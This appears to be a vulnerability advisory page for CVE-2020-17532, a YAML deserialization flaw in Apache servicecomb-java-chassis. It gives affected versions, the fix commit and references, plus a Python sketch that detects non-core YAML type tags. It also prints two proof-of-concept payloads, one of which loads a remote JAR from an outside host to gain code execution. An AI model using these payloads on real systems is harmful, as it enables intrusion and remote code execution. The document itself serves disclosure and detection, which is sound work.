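# CVE-2020-17532 Apache servicecomb-java-chassis YAML Deserialization Vulnerability
When the handler-router component is enabled in servicecomb-java-chassis, an authenticated user may inject some data and cause arbitrary code execution.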
**commit:**
https://github.com/apache/servicecomb-java-chassis/commit/839a52e27c754cb5ce14f20063902f21065bd26c
Affected versions: < 2.1.5
**PoC:**
```
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://127.0.0.1/"]]]]
```
```
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://artsploit.com/yaml-payload.jar"]
]]
]
```
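A detection-side sketch for the payload shape shown above, added here as an example and not taken from the servicecomb project or its fix: it scans YAML text for explicit type tags outside the YAML core set, which is what a loader that maps tags to Java classes (as SnakeYAML 1.x's default constructor does) would instantiate. The function name, the allowlist and the benign router-rule sample are assumptions constructed for illustration; the regex is a line-based heuristic, not a full YAML parser.

```python
import re

# Tags from the YAML 1.1 type repository. Any other "!!name" is treated by a
# class-resolving loader as a request to construct that Java type.
YAML_CORE_TAGS = {
    "str", "int", "float", "bool", "null", "map", "seq", "binary",
    "timestamp", "set", "omap", "pairs", "merge", "value",
}

# "!!name" shorthand; the lookbehind skips "!!" glued to a word or a quote,
# e.g. inside a quoted scalar such as "alert!!now".
SHORT_TAG = re.compile(r"(?<![\w\"'])!!([A-Za-z_$][\w$.]*)")
# Verbatim form of the same tag namespace: !<tag:yaml.org,2002:name>
VERBATIM_TAG = re.compile(r"!<tag:yaml\.org,2002:([^>\s]+)>")


def find_type_tags(text):
    """Return sorted (line_no, tag_name) pairs for every non-core type tag."""
    hits = set()
    for line_no, line in enumerate(text.splitlines(), 1):
        for pattern in (SHORT_TAG, VERBATIM_TAG):
            for match in pattern.finditer(line):
                name = match.group(1)
                if name not in YAML_CORE_TAGS:
                    hits.add((line_no, name))
    return sorted(hits)


# First PoC string from this page (loopback URL), used as the positive sample.
POC = ('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader '
       '[[!!java.net.URL ["http://127.0.0.1/"]]]]')

# Constructed, simplified router-rule-like document used as the negative sample.
BENIGN = """\
- precedence: 2
  note: "alert!!now"
  route:
    - weight: !!int "100"
      tags:
        version: 1.0.0
"""

if __name__ == "__main__":
    for label, doc in (("poc", POC), ("benign", BENIGN)):
        print(label, find_type_tags(doc))
```

A check like this fits in log review or a gateway rule for values that reach the router configuration; it does not replace upgrading to 2.1.5 or later.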
ref:
* https://github.com/apache/servicecomb-java-chassis/commit/839a52e27c754cb5ce14f20063902f21065bd26c
* https://seclists.org/oss-sec/2021/q1/60
* https://forum.ywhack.com/thread-115020-1-1.html